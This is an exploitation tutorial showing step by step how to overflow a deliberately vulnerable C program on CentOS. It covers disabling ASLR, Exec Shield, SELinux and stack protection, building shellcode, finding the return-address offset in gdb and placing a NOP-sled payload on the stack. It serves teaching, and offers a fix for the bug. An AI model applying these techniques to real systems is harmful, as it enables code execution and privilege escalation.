Writing Buffer Overflows

15 October 2013

Required Tools:

  1. gcc
  2. gdb
  3. nasm
  4. ld
  5. objdump
  6. python

This tutorial assumes that you have a CentOS test environment. It was written using a fresh CentOS 6.3 virtual machine running on Oracle VirtualBox with 512 MB of RAM and an 8 GB hard drive. It also assumes Python 2; Python version 2.6 was used for documentation. If you have the above tools you'll be able to compile all the code and test it out on your CentOS box. Note that you will need root privileges to make some of the modifications specified. To install the above software on CentOS use the following (ld and objdump are both provided by the binutils package):

$ sudo yum install gcc gdb nasm binutils python

Introduction

Buffer overflows are some of the most prevalent and dangerous vulnerabilities in computer security. The problem essentially boils down to two main factors. The first is that C doesn't enforce bounds checking, so if a programmer isn't careful to validate the size of input, unexpected behavior may occur. The second is that many programs written in C run with elevated privileges. This means that an exploit of such a program yields effective control at the privilege level of the exploited process. Since many of these processes run as root, or SYSTEM, successfully exploiting them gives a malicious user a privilege escalation that amounts to total control over the target machine.

Buffer overflow exploits are accomplished by abusing the way that C handles memory allocation. When a program in C begins, or starts a function, it allocates a stack of memory for that particular piece of the program. This stack consists of space for variables and data, as well as pointers to return flow control to the proper place in the program. This allows stacks to grow dynamically as programs branch and carry out subroutines and other processes. This is efficient because the stack doesn't have to be initialized at the start of the program with room for every possible execution path of the program. Instead, as the program runs, memory is allocated on an as-needed basis.

Programs don't run in a vacuum, however, and one process can't be allowed to own the stack entirely until its completion. For this reason the return pointer on each of these individual pieces of the stack (called stack frames) is critical, so that at the end of the frame's execution the processor can return to the original program instructions and continue the program.

Because these frames are allocated dynamically and because they are of a fixed size, if a programmer is not careful it becomes possible to pass in more variable data than is reserved on the stack. For instance, if the following represents a frame:

------------------
|      data      |
------------------
|      data      |
------------------
|      data      |
------------------
|      data      |
------------------
|      data      |
------------------
| return pointer |
------------------

You can see that there are 5 'slots' for data in the frame; the sixth slot is for the return pointer. What happens if the program tries to write 6 'slots' of data into the frame? Probably a crash, but if the attacker is careful they can overwrite the return pointer so that it points to a different location in memory, perhaps a location that contains malicious code.
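To make the slot picture concrete, here is a toy model in Python. It is only a sketch of the diagram, not of how a real processor lays out a frame, and the names write_to_frame, SAFE_RETURN and attacker_address are made up for illustration.

```python
# Toy model of the six-slot frame drawn above; not how a real CPU stores data.
FRAME_DATA_SLOTS = 5          # five 'data' slots, as in the diagram
SAFE_RETURN = "main+0x20"     # hypothetical legitimate return location


def write_to_frame(values):
    """Write values into the frame one slot at a time, with no bounds check."""
    frame = ["data"] * FRAME_DATA_SLOTS + [SAFE_RETURN]
    for i, value in enumerate(values):
        if i >= len(frame):
            break             # anything beyond the frame is ignored in this model
        frame[i] = value
    return frame


# Five values fit: the return pointer is untouched.
safe = write_to_frame(["A"] * 5)
# Six values: the sixth lands in the return pointer slot.
smashed = write_to_frame(["A"] * 5 + ["attacker_address"])

print(safe[-1])
print(smashed[-1])
```

The first print shows the original return location and the second shows the attacker's value sitting where the return pointer used to be.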

Turning Off Stack Randomization

Before we get too far into this tutorial let's make sure to create an 'easier' environment for our work. The Linux VA patch is a modification to the kernel that allows for stack randomization, which makes it much harder to create reliable buffer overflow exploits. This patch randomizes the stack pointer, making it more difficult to find our jump address to kick off the exploit. It's possible to carry out the exploit with this patch enabled, just much more difficult. Make sure the Linux VA patch is disabled by checking that randomize_va_space is turned off (set to zero):

$ cat /proc/sys/kernel/randomize_va_space
0

Red Hat also implements another layer of protection called Exec Shield. Exec Shield is a form of Data Execution Prevention (DEP) that makes certain portions of memory space non-executable. You'll want to disable this protection as well. You can check to see if Exec Shield is enabled using the command:

$ cat /proc/sys/kernel/exec-shield
0

If you happen to find either of these enabled (set to a non-zero number) then disable them by adding the following lines to /etc/sysctl.conf (you'll need root to do this):

kernel.randomize_va_space = 0
kernel.exec-shield = 0

Finally you can load these new values into the running kernel using the command:

$ sudo sysctl -p
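If you'd rather check both settings in one go, something like the following Python sketch should do. The helper names read_setting and report are my own, and the script only reads the two /proc files mentioned above; it doesn't change anything.

```python
import os


def read_setting(path):
    """Return the contents of a /proc setting as a string, or None if absent."""
    if not os.path.exists(path):
        return None
    with open(path) as handle:
        return handle.read().strip()


def report(paths):
    """Map each path to 'disabled', 'enabled (...)' or 'not present'."""
    results = {}
    for path in paths:
        value = read_setting(path)
        if value is None:
            results[path] = "not present"
        elif value == "0":
            results[path] = "disabled"
        else:
            results[path] = "enabled (%s)" % value
    return results


settings = [
    "/proc/sys/kernel/randomize_va_space",
    "/proc/sys/kernel/exec-shield",
]
for path, state in sorted(report(settings).items()):
    print("%s: %s" % (path, state))
```

On kernels that don't ship Exec Shield the second file simply won't exist, which the script reports as 'not present'.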

The most effective way to hijack the return pointer is to pass in malicious bytecode as part of the 'data' and then overwrite the return pointer with the location of that bytecode. Even this process is tricky though, because the return pointer must point to the exact start of the exploit code or the code will fail. For instance, if the pointer lands in the middle of the exploit code it won't execute properly. A neat trick is to pad the start of the exploit shellcode with NOP (no operation) instructions. When the machine encounters a NOP it simply moves to the next instruction. If there is a series of NOP instructions preceding the malicious shellcode then the pointer merely has to hit one of them, and execution will slide down the NOPs to the shellcode. This technique is called a NOP sled.
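The sled idea can be modeled in a few lines of Python. This is a simulation only: the 0xCC bytes are a stand-in marker rather than real shellcode, and the slide function is a made-up name that imitates a processor stepping over NOPs.

```python
NOP = 0x90
SLED_LENGTH = 30
# Stand-in bytes for real shellcode; 0xCC is used here only as a marker.
FAKE_SHELLCODE = bytearray([0xCC] * 8)

memory = bytearray([NOP] * SLED_LENGTH) + FAKE_SHELLCODE
SHELLCODE_START = SLED_LENGTH


def slide(memory, entry):
    """Step over NOPs from entry and return the index where execution settles."""
    position = entry
    while position < len(memory) and memory[position] == NOP:
        position += 1
    return position


# Every entry point inside the sled slides down to the first shellcode byte.
hits = [slide(memory, entry) == SHELLCODE_START for entry in range(SLED_LENGTH)]
print(all(hits))

# Landing inside the shellcode skips its first instructions instead.
print(slide(memory, SHELLCODE_START + 3) == SHELLCODE_START)
```

Any of the 30 sled positions works as a landing spot, while a landing three bytes into the shellcode does not, which is exactly why the sled makes the exploit more forgiving.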

Other Fine Tuning

You may notice that a lot of tutorials online have a bunch of documentation that points to examining the core dumps of programs that throw segmentation faults. When utilizing your own modern Linux box you might find that your buffer overflow attempts are causing a segmentation fault, but not a core dump. Core dumps can be controlled (if you have sufficient privileges) at the command line as part of your user profile. To check if you have core dump enabled try:

$ ulimit -c
0

If you see the above output (a zero) it means you don't have the ability to view core dumps. Go ahead and change that using:

$ ulimit -c unlimited

This will enable you to view the core dump of your files using GDB. The syntax is:

$ gdb PROGRAM COREFILE

Where PROGRAM is the name of the program that just caused the segmentation fault and COREFILE is the name of the core dump file (note that this won't always be 'core'). Also make sure that SELinux is turned off. You can check the status of SELinux using:

$ cat /selinux/enforce

If you get a 'No such file' error then SELinux is turned off. Otherwise edit the file /etc/selinux/config, change the SELINUX value to disabled, and restart your machine.

A Further Look at Stack

When you read about buffer overflows you'll read a lot about stacks, heaps, frames and the buffer. It's all a little confusing, even if you understand some of the topics, so it's worth examining more closely. As programs are executed they are assigned blocks of memory. Ultimately these are just places in RAM. The processor runs through blocks of memory in the order supplied by the 'register'. The register keeps track of which instruction is to be passed to the processor next and where it is located (on the 32-bit x86 machine used here this is the instruction pointer, eip). When a program starts it is assigned a block of memory that looks something like this:

 ---------------------------
|  Arguments and variables  |
 ---------------------------
|  Stack                    |
 ---------------------------
|  Stack                    |
 ---------------------------
|  Unused Memory            |
 ---------------------------
|  Unused Memory            |
 ---------------------------
|  Heap                     |
 ---------------------------
|  Program Data             |
 ---------------------------

Ok, so that looks a little weird, but it easily demonstrates how the stack can grow down and the heap can grow up. Those are the two areas where dynamic memory is utilized.

The stack is reserved for dynamic input and function variables. You need this to be dynamic because before it runs a program has no idea what sort of input it will get or need to assign to a variable. Some variables might get their value from user input, some from the system, some from reading files, and so on. You can see how it would be impossible to calculate ahead of time what sort of input the program would get (and how that might cause the program to branch). So the program lines up its instructions at the low addresses (the Program Data part of the diagram). As it runs into blocks of code it allocates space on the stack to hold the variables.

So let's say the program starts with main(). The computer allocates a frame on the stack for the main() function that holds its variables, etc. So the stack looks something like:

  -----------------
 | data            |
 | data            |
 | return address  |
  -----------------

I've drawn this upside down because it's easier to understand as a stack in this orientation. Now the register points at the top of the frame and begins to feed instructions into the processor. Let's say the program calls a function called foo() in main() though. What happens then? Well, a new frame is added to the stack, with the return pointer at the end showing the register where to move next once it's done with that particular frame. Now the stack might look something like:

  -----------------
 | data            |
 | return address  |
  -----------------
 | data            |
 | data            |
 | return address  |
  -----------------

The variables for foo() are now on top of the stack. The return pointer at the end of foo()'s frame shows the register where to move to pick back up in main() at the point after the function foo() is called. It is important to note that these pointers show the register where to return to execute program instructions, which are usually held at the bottom of the memory diagram as program data. Knowing this you can see why a return pointer is necessary, rather than having the program just chew down the stack.
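The push and pop behavior of frames can be sketched with a plain Python list. Treat it as an illustration of the diagrams above rather than of real memory: the call and ret helpers and the text labels used as 'return addresses' are hypothetical.

```python
# Toy call stack: each frame records its locals and where to resume afterwards.
stack = []


def call(function_name, local_data, return_to):
    """Push a new frame on top of the stack."""
    stack.append({"function": function_name,
                  "data": local_data,
                  "return address": return_to})


def ret():
    """Pop the top frame and report where execution resumes."""
    frame = stack.pop()
    return frame["return address"]


# The labels below are hypothetical placeholders, not real addresses.
call("main", ["data", "data"], "caller of main")
call("foo", ["data"], "main, just after the call to foo()")

print(stack[-1]["function"])   # frame currently on top
resume = ret()
print(resume)
print(stack[-1]["function"])
```

After foo() returns, its frame is gone and main()'s frame is back on top, with execution resuming at the location stored in foo()'s return slot. Overwrite that slot and you decide where execution resumes.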

A Look at the Victim

Let's examine the following code for the blame program. The code actually makes a rudimentary attempt to prevent a buffer overflow exploit, but one which doesn't work.

#include <stdio.h>
#include <string.h>
#define INPUT_BUFFER 256  /* maximum name size */

/*
 * read input, copy into s
 * gets() is insecure and prints a warning
 *    so we use this instead
 */
void getlines(char *s) {
        int c;
        while ((c=getchar()) != EOF)
                *s++ = c;
        *s = '\0';
}

/*
 * convert newlines to nulls in place
 */
void purgenewlines(char *s) {
        int l;
        l = strlen(s);
        while (l--)
                if (s[l] == '\n')
                        s[l] = '\0';
}

int main() {
        char scapegoat[INPUT_BUFFER];
        getlines(scapegoat);
        /* this check ensures there's no buffer overflow */
        if (strlen(scapegoat) < INPUT_BUFFER) {
                purgenewlines(scapegoat);
                printf("It's all %s's fault.\n", scapegoat);
        }
        return 0;
}

Looking at the code you can see that the main() function sets up the char array scapegoat with a size set to the constant INPUT_BUFFER (which is 256). A pointer to this array is then passed to the getlines() function, which copies the program's input into scapegoat using getchar(). The problem is that by the time getlines() finishes and control returns to main() the buffer has already been overflowed, so the check for length that occurs as the next instruction:

if (strlen(scapegoat) < INPUT_BUFFER) {

happens too late (the chicken has already flown the coop). Let's begin to explore how this particular buffer overflow works. Copy the code above into a text file on your CentOS machine and save it as blame.c then compile it using the command (which will disable some additional stack protections implemented by the compiler):

$ gcc -fno-stack-protector -z execstack blame.c -o blame

Overflowing the Buffer

First let's ensure that we actually can overflow the buffer. We'll use a little Python at the command line to create some input then check out what is going on using gdb. First I'll demonstrate blame working correctly, however:

$ echo foo | ./blame
It's all foo's fault.
$ python -c 'print "A"*456' | ./blame
Segmentation fault

You should see the program crash and a new core file in your current directory (note that the extension may vary since it's the process ID (PID) of the program when it crashes):

$ ls
blame  blame.c  core.1291

You can look at this core file using gdb like so:

$ gdb blame core.1291 
GNU gdb (GDB) Red Hat Enterprise Linux (7.2-60.el6_4.1)
Copyright (C) 2010 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.  Type "show copying"
and "show warranty" for details.
This GDB was configured as "i686-redhat-linux-gnu".
For bug reporting instructions, please see:
<http://www.gnu.org/software/gdb/bugs/>...
Reading symbols from /home/justin/blame...(no debugging symbols found)...done.
[New Thread 1291]
Missing separate debuginfo for 
Try: yum --disablerepo='*' --enablerepo='*-debug*' install /usr/lib/debug/.build-id/05/14ca88cad3d3d3eee1b7561eaf052da205c024
Reading symbols from /lib/libc.so.6...(no debugging symbols found)...done.
Loaded symbols for /lib/libc.so.6
Reading symbols from /lib/ld-linux.so.2...(no debugging symbols found)...done.
Loaded symbols for /lib/ld-linux.so.2
Core was generated by `./blame'.
Program terminated with signal 11, Segmentation fault.
#0  0x41414141 in ?? ()
Missing separate debuginfos, use: debuginfo-install glibc-2.12-1.107.el6_4.4.i686

We can see that the program terminated at 0x41414141. This is no coincidence, since 0x41 is the hexadecimal ASCII code for capital A.
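If you want to convince yourself of this, a quick Python check (just a sketch using the standard struct module) turns the faulting address back into the characters it was built from:

```python
import struct

fault_address = 0x41414141

# Pack the 32-bit value the way x86 stores it (little endian) and view the bytes.
raw = struct.pack("<I", fault_address)
text = raw.decode("ascii")

print(text)
print("0x%02x" % ord("A"))
```

The four bytes decode to four capital A's, straight out of our input.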

We can use gdb to show us the values of all the registers at the time of the crash. This will show us the value of the extended base pointer (ebp) as well as the extended stack pointer (esp), which the computer uses to track execution in the memory stack. To view the registers use the info registers command in gdb like so:

(gdb) info registers
eax            0x0	0
ecx            0x20	32
edx            0x5	5
ebx            0x2c3ff4	2899956
esp            0xbffff630	0xbffff630
ebp            0x41414141	0x41414141
esi            0x0	0
edi            0x0	0
eip            0x41414141	0x41414141
eflags         0x10216	[ PF AF IF RF ]
cs             0x73	115
ss             0x7b	123
ds             0x7b	123
es             0x7b	123
fs             0x0	0
gs             0x33	51

Looking at the output you can see that the ebp and the eip have both been overwritten with a series of ASCII A's. The eip in particular is the pointer to the next instruction, and since the memory address 0x41414141 is not a valid location for the program to execute, the program crashed.

A Simple Fix

A simple change in the function will prevent this behavior, but you can easily see how a vulnerability such as this could be overlooked. If getlines() is rewritten as:

void getlines(char *s) {
        int c;
        int x = 0;

        while ((c=getchar()) != EOF && x < INPUT_BUFFER - 1) {
                *s++ = c;
                x++;
        }
        *s++ = '\0';
}

The program functions safely regardless of the input size. This modification also prevents the gnarly segfault errors from showing up, effectively handling exceptions in a cleaner manner.

Back to Our Regularly Scheduled Exploit

Ok, so now back to our exploit. We know now that an input size of 456 bytes will cause a buffer overflow and overwrite the eip. If we can exploit this weakness we can cause the program to execute some arbitrary commands. Let's begin with what is arguably the most difficult part of this process, our shellcode. While there are shellcode generators out there online, it's a lot easier to be able to build your own, especially if you want to be able to craft very specific behavior out of your buffer overflow.

Generating Shellcode

Let's create some shellcode that makes blame print out the output "now I p0wn your computer" instead of its normal function. Usually you'll want a buffer overflow to spawn a shell or perhaps open a backdoor listening port on the target computer, but we'll keep it simple for now. Shellcode, often referred to as bytecode, is basically just assembly language that has been assembled into raw machine instructions. Now, don't worry if you don't know a whole lot of assembly at this point; we're going to leverage some tools to help make it easier. The first thing we want to do is create a program to test our bytecode, using the following:

 
/*shellcodetest.c*/

char shellcode[] = "substitute shellcode here";
int main(int argc, char **argv)
{
  int (*func)();
  func = (int (*)()) shellcode;
  (int)(*func)();
}

We can substitute our shellcode for the "substitute shellcode here" portion. Go ahead and create the file shellcodetest.c by cutting and pasting the above. Next compile this program so we can use it (I'm assuming you know how to compile raw C code but I'll go ahead and be explicit here just in case):

 
$ gcc -o shellcodetest shellcodetest.c

This creates the executable shellcodetest in the current working directory. Now, it isn't going to work at this point since we don't actually have any shellcode assigned to the shellcode[] variable. Let's go ahead and tackle that challenge now.

For this task we're totally going to gank the hello.asm code from http://www.vividmachines.com/shellcode/shellcode.html (see citations below) and modify it to suit our purposes. You can use C to generate your shellcode as well, but there are some problems that crop up along the way. For instance, you generally cannot have any null bytes (\x00) in your shellcode, because C string functions such as strcpy() and strlen() treat a null as the end of the text (if the vulnerable program copies its input with one of these, the copy stops at the first null and your shellcode won't be loaded into memory entirely). For now we'll gloss over how to modify your assembly code using 'xor' to get rid of these null bytes and keep things simple. The code we're going to use is as follows:

 
;hello.asm
[SECTION .text]

global _start


_start:

        jmp short ender

        starter:

        xor eax, eax    ;clean up the registers
        xor ebx, ebx
        xor edx, edx
        xor ecx, ecx

        mov al, 4       ;syscall write
        mov bl, 1       ;stdout is 1
        pop ecx         ;get the address of the string from the stack
        mov dl, 24       ;length of the string
        int 0x80

        xor eax, eax
        mov al, 1       ;exit the shellcode
        xor ebx,ebx
        int 0x80

        ender:
        call starter    ;put the address of the string on the stack
        db 'now I p0wn your computer'

If we were really l337 we'd use 'now I p0wn j00r b0x3n' as our string, but that's another tutorial ;) For now we do the following:

 
$ nasm -f elf hello.asm
$ ld -o hello hello.o

You can confirm that everything worked properly by executing the hello program at the command line:

 
$ ./hello
now I p0wn your computer$

Once you're sure your assembly code works it's time to look at the disassembly so that we can pull out the hexadecimal instructions to introduce into our shellcode:

 
$ objdump -d hello

hello:     file format elf32-i386


Disassembly of section .text:

08048080 <_start>:
 8048080:       eb 19                   jmp    804809b <ender>

08048082 <starter>:
 8048082:       31 c0                   xor    %eax,%eax
 8048084:       31 db                   xor    %ebx,%ebx
 8048086:       31 d2                   xor    %edx,%edx
 8048088:       31 c9                   xor    %ecx,%ecx
 804808a:       b0 04                   mov    $0x4,%al
 804808c:       b3 01                   mov    $0x1,%bl
 804808e:       59                      pop    %ecx
 804808f:       b2 18                   mov    $0x18,%dl
 8048091:       cd 80                   int    $0x80
 8048093:       31 c0                   xor    %eax,%eax
 8048095:       b0 01                   mov    $0x1,%al
 8048097:       31 db                   xor    %ebx,%ebx
 8048099:       cd 80                   int    $0x80

0804809b <ender>:
 804809b:       e8 e2 ff ff ff          call   8048082 <starter>
 80480a0:       6e                      outsb  %ds:(%esi),(%dx)
 80480a1:       6f                      outsl  %ds:(%esi),(%dx)
 80480a2:       77 20                   ja     80480c4 <ender+0x29>
 80480a4:       49                      dec    %ecx
 80480a5:       20 70 30                and    %dh,0x30(%eax)
 80480a8:       77 6e                   ja     8048118 <ender+0x7d>
 80480aa:       20 79 6f                and    %bh,0x6f(%ecx)
 80480ad:       75 72                   jne    8048121 <ender+0x86>
 80480af:       20 63 6f                and    %ah,0x6f(%ebx)
 80480b2:       6d                      insl   (%dx),%es:(%edi)
 80480b3:       70 75                   jo     804812a <ender+0x8f>
 80480b5:       74 65                   je     804811c <ender+0x81>
 80480b7:       72                      .byte 0x72

What we're doing here is using the programs nasm, ld, and objdump. The important values (the good stuff) are contained in the second column of the output (the part on the second line that reads 'eb 19'). If you copy all of these out and preface them with "\x" then you have valid shellcode.

So copying out the above example gives us the following 56 bytes:

 
eb 19 31 c0 31 db 31 d2 31 c9 b0 04 b3 01 59 b2 18 cd
80 31 c0 b0 01 31 db cd 80 e8 e2 ff ff ff 6e 6f 77 20
49 20 70 30 77 6e 20 79 6f 75 72 20 63 6f 6d 70 75 74
65 72
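Prefixing every pair with "\x" by hand gets tedious, so here is a small Python sketch that does the conversion and runs two sanity checks along the way (the byte count and a scan for null bytes). The variable names are arbitrary.

```python
# Opcode bytes copied from the second column of the objdump listing above.
hex_dump = """
eb 19 31 c0 31 db 31 d2 31 c9 b0 04 b3 01 59 b2 18 cd
80 31 c0 b0 01 31 db cd 80 e8 e2 ff ff ff 6e 6f 77 20
49 20 70 30 77 6e 20 79 6f 75 72 20 63 6f 6d 70 75 74
65 72
"""

pairs = hex_dump.split()

# Prefix every pair with \x to form a C (or Python) string literal body.
literal = "".join("\\x" + pair for pair in pairs)

# The same bytes as raw integer values, useful for sanity checks.
values = [int(pair, 16) for pair in pairs]

print(len(values))          # number of bytes in the shellcode
print(0 in values)          # True would mean a null byte is present
print(literal)
```

The last line printed is the escaped string, ready to paste between the quotes of a C char array.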

We transform this into shellcode and put it into our test program above:

 
/* revised shellcodetest.c */
/* now with working code :) */
char code[] = "\xeb\x19\x31\xc0\x31\xdb\x31\xd2\x31\xc9\xb0\x04\xb3"\
"\x01\x59\xb2\x18\xcd\x80\x31\xc0\xb0\x01\x31\xdb\xcd\x80\xe8\xe2\xff"\
"\xff\xff\x6e\x6f\x77\x20\x49\x20\x70\x30\x77\x6e\x20\x79\x6f\x75\x72"\
"\x20\x63\x6f\x6d\x70\x75\x74\x65\x72";

int main(int argc, char **argv)
{
  int (*func)();
  func = (int (*)()) code;
  (int)(*func)();
}

Let's test out the above code to make sure it works. Save the modified file as shellcodetest.c. Next we'll have to compile the program using gcc and a couple of handy flags that disable stack protection and stack execution protection, which the compiler otherwise enables. Compile it using the following command (note this is just one line):

 
$ gcc -fno-stack-protector -z execstack -o shellcodetest shellcodetest.c

Then test the shellcode to see if it works:

 
$ ./shellcodetest
now I p0wn your computer

Injecting the Shellcode

Ok, the next part of the process is to actually inject the shellcode into a running process with a buffer overflow exploit. First let's examine our overflow of the blame program. We know that with 456 bytes of A's the eip is overwritten with four bytes' worth of A's, or 0x41414141. If we examine this behavior more closely we'll find that the bytes that overwrite the eip aren't in fact the last four bytes of the payload.

 
$ python -c 'print "A"*100 + "B"*56 + "C"*300' | ./blame
Segmentation fault (core dumped)
$ ls
blame  blame.c  core.1291  core.1315

We can now look at this new core file, noting that the program crashed trying to execute the address 0x43434343 and that the eip is overwritten with 0x43 bytes, the ASCII code for the letter C.

 
$ gdb blame core.1315
[New Thread 1315]
Core was generated by `./blame'.
Program terminated with signal 11, Segmentation fault.
#0  0x43434343 in ?? ()
(gdb) i r
eax            0x0	0
ecx            0x20	32
edx            0x9	9
ebx            0x2c3ff4	2899956
esp            0xbffff630	0xbffff630
ebp            0x43434343	0x43434343
esi            0x0	0
edi            0x0	0
eip            0x43434343	0x43434343
eflags         0x10216	[ PF AF IF RF ]
cs             0x73	115
ss             0x7b	123
ds             0x7b	123
es             0x7b	123
fs             0x0	0
gs             0x33	51

You'll notice I used a shorthand for the info registers command by simply typing i r to get the same data. This technique of running the program, dumping the core, then examining the core file with gdb is handy, but somewhat time consuming. What we actually want to do is run this process from within gdb to cut down on time. We can do this by firing up gdb and running the blame program and redirecting input from a file. We can jump out of gdb at any time to modify this text file using:

 
(gdb) shell
$

Then returning to gdb using the command:

 
$ exit
(gdb)

This will allow us to modify our input text file quickly and easily. What we're trying to do is use A, B, and C to line up four bytes in the eip that we can use to point to our shell code. When we can overwrite the eip, and only the eip, with four letter B's then we know exactly how to align our buffer overflow so that the overwritten eip is within our control (and can be used to point to our shellcode). Let's get started as follows:

 
$ python -c 'print "A"*100 + "B"*4 + "C"*250' > input
$ cat input
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA [... snip ...]
$ gdb blame
(gdb) run blame < input
Starting program: /home/justin/blame blame < input
Program received signal SIGSEGV, Segmentation fault.
0x43434343 in ?? ()
(gdb) i r
eax            0x0	0
ecx            0x20	32
edx            0x3	3
ebx            0x2c3ff4	2899956
esp            0xbffff5f0	0xbffff5f0
ebp            0x43434343	0x43434343
esi            0x0	0
edi            0x0	0
eip            0x43434343	0x43434343
eflags         0x10212	[ AF IF RF ]
cs             0x73	115
ss             0x7b	123
ds             0x7b	123
es             0x7b	123
fs             0x0	0
gs             0x33	51

It looks like on our first try the eip is being overwritten with C characters, so let's increase the number of A's and decrease the number of C's like so:

 
(gdb) shell
$ python -c 'print "A"*300 + "B"*4 + "C"*52' > input
$ exit
exit
(gdb) run blame < input
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/justin/blame blame < input
Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()
(gdb) i r
eax            0x0	0
ecx            0x20	32
edx            0x5	5
ebx            0x2c3ff4	2899956
esp            0xbffff5f0	0xbffff5f0
ebp            0x41414141	0x41414141
esi            0x0	0
edi            0x0	0
eip            0x41414141	0x41414141
eflags         0x10216	[ PF AF IF RF ]
cs             0x73	115
ss             0x7b	123
ds             0x7b	123
es             0x7b	123
fs             0x0	0
gs             0x33	51

As we can see we have overshot the mark and now eip is overwritten with A's. We continue this process until we can narrow in on a way to place the B's over the eip like so:

 
(gdb) shell
$ python -c 'print "A"*250 + "B"*4 + "C"*102' > input
$ exit
exit
(gdb) run blame < input
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/justin/blame blame < input
Program received signal SIGSEGV, Segmentation fault.
0x43434343 in ?? ()
(gdb) shell
$ python -c 'print "A"*270 + "B"*4 + "C"*82' > input
$ exit
exit
(gdb) run blame < input
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/justin/blame blame < input
Program received signal SIGSEGV, Segmentation fault.
0x42424141 in ?? ()

And now you can see I've managed to get a couple of B's (ASCII 0x42) into the eip, so I now know that to overwrite the eip with B's I need 268 A's first, then my B's, then 84 C's.
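The arithmetic behind that conclusion can be double checked in Python. This is only a sketch of the reasoning: it rebuilds the input that crashed at 0x42424141, converts the eip value back into memory byte order, and looks for those four bytes in the input. It works here because the boundary between the A's and the B's occurs only once in the payload.

```python
import struct

# The input that produced the crash at 0x42424141.
payload = b"A" * 270 + b"B" * 4 + b"C" * 82
observed_eip = 0x42424141

# x86 is little endian, so convert the register value into memory byte order.
eip_bytes = struct.pack("<I", observed_eip)

# The first place those four bytes occur in the input is the eip offset.
offset = payload.find(eip_bytes)

print(offset)
print(len(payload) - offset - 4)   # bytes left over after the four eip bytes
```

The two numbers printed are the count of filler bytes needed before the eip and the count that follow it.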

 
(gdb) shell
$ python -c 'print "A"*268 + "B"*4 + "C"*84' > input
$ exit
exit
(gdb) run blame < input
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/justin/blame blame < input

Program received signal SIGSEGV, Segmentation fault.
0x42424242 in ?? ()
(gdb) i r
eax            0x0	0
ecx            0x20	32
edx            0x5	5
ebx            0x2c3ff4	2899956
esp            0xbffff5f0	0xbffff5f0
ebp            0x41414141	0x41414141
esi            0x0	0
edi            0x0	0
eip            0x42424242	0x42424242
eflags         0x10216	[ PF AF IF RF ]
cs             0x73	115
ss             0x7b	123
ds             0x7b	123
es             0x7b	123
fs             0x0	0
gs             0x33	51

And voilà, now I have the exact boundaries of my exploit! Now, let's add our shellcode (which is 56 bytes long) to the end, replacing the 84 C characters, with a NOP sled in front of it. We can then use gdb to examine the actual contents of the stack, in this case looking at the 256 bytes starting at the esp, and check to ensure that our shellcode is actually there:

 
(gdb) shell
$ python -c 'print "A"*268 + "B"*4 + "\x90"*30 + "\xeb\x19\x31\xc0\x31\xdb\x31\xd2\x31\xc9\xb0\x04\xb3\x01\x59\xb2\x18\xcd\x80\x31\xc0\xb0\x01\x31\xdb\xcd\x80\xe8\xe2\xff\xff\xff\x6e\x6f\x77\x20\x49\x20\x70\x30\x77\x6e\x20\x79\x6f\x75\x72\x20\x63\x6f\x6d\x70\x75\x74\x65\x72"' > input
$ exit
exit
(gdb) run blame < input
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/justin/blame blame < input

Program received signal SIGSEGV, Segmentation fault.
0x42424242 in ?? ()
(gdb) i r
eax            0x0	0
ecx            0x20	32
edx            0x1	1
ebx            0x2c3ff4	2899956
esp            0xbffff5f0	0xbffff5f0
ebp            0x41414141	0x41414141
esi            0x0	0
edi            0x0	0
eip            0x42424242	0x42424242
eflags         0x10216	[ PF AF IF RF ]
cs             0x73	115
ss             0x7b	123
ds             0x7b	123
es             0x7b	123
fs             0x0	0
gs             0x33	51
(gdb) x/256xb $esp
0xbffff5f0:	0x90	0x90	0x90	0x90	0x90	0x90	0x90	0x90
0xbffff5f8:	0x90	0x90	0x90	0x90	0x90	0x90	0x90	0x90
0xbffff600:	0x90	0x90	0x90	0x90	0x90	0x90	0x90	0x90
0xbffff608:	0x90	0x90	0x90	0x90	0x90	0x90	0xeb	0x19
0xbffff610:	0x31	0xc0	0x31	0xdb	0x31	0xd2	0x31	0xc9
0xbffff618:	0xb0	0x04	0xb3	0x01	0x59	0xb2	0x18	0xcd
0xbffff620:	0x80	0x31	0xc0	0xb0	0x01	0x31	0xdb	0xcd
0xbffff628:	0x80	0xe8	0xe2	0xff	0xff	0xff	0x6e	0x6f
0xbffff630:	0x77	0x20	0x49	0x20	0x70	0x30	0x77	0x6e
0xbffff638:	0x20	0x79	0x6f	0x75	0x72	0x20	0x63	0x6f
0xbffff640:	0x6d	0x70	0x75	0x74	0x65	0x72	0x0a	0x00
0xbffff648:	0x02	0x00	0x00	0x00	0x70	0x83	0x04	0x08
0xbffff650:	0x00	0x00	0x00	0x00	0x20	0x4d	0x12	0x00
0xbffff658:	0x0b	0xcc	0x14	0x00	0xc4	0xef	0x12	0x00
0xbffff660:	0x02	0x00	0x00	0x00	0x70	0x83	0x04	0x08
0xbffff668:	0x00	0x00	0x00	0x00	0x91	0x83	0x04	0x08
0xbffff670:	0x8d	0x84	0x04	0x08	0x02	0x00	0x00	0x00
0xbffff678:	0x94	0xf6	0xff	0xbf	0xf0	0x84	0x04	0x08
0xbffff680:	0xe0	0x84	0x04	0x08	0xa0	0xf4	0x11	0x00
0xbffff688:	0x8c	0xf6	0xff	0xbf	0x00	0x00	0x00	0x00
0xbffff690:	0x02	0x00	0x00	0x00	0xc0	0xf7	0xff	0xbf
0xbffff698:	0xd3	0xf7	0xff	0xbf	0x00	0x00	0x00	0x00
0xbffff6a0:	0xd9	0xf7	0xff	0xbf	0xf8	0xf7	0xff	0xbf
0xbffff6a8:	0x08	0xf8	0xff	0xbf	0x1c	0xf8	0xff	0xbf
0xbffff6b0:	0x2a	0xf8	0xff	0xbf	0x4b	0xf8	0xff	0xbf
0xbffff6b8:	0x5e	0xf8	0xff	0xbf	0x6a	0xf8	0xff	0xbf
0xbffff6c0:	0x77	0xfe	0xff	0xbf	0x83	0xfe	0xff	0xbf
0xbffff6c8:	0xd6	0xfe	0xff	0xbf	0xf2	0xfe	0xff	0xbf
0xbffff6d0:	0x01	0xff	0xff	0xbf	0x12	0xff	0xff	0xbf
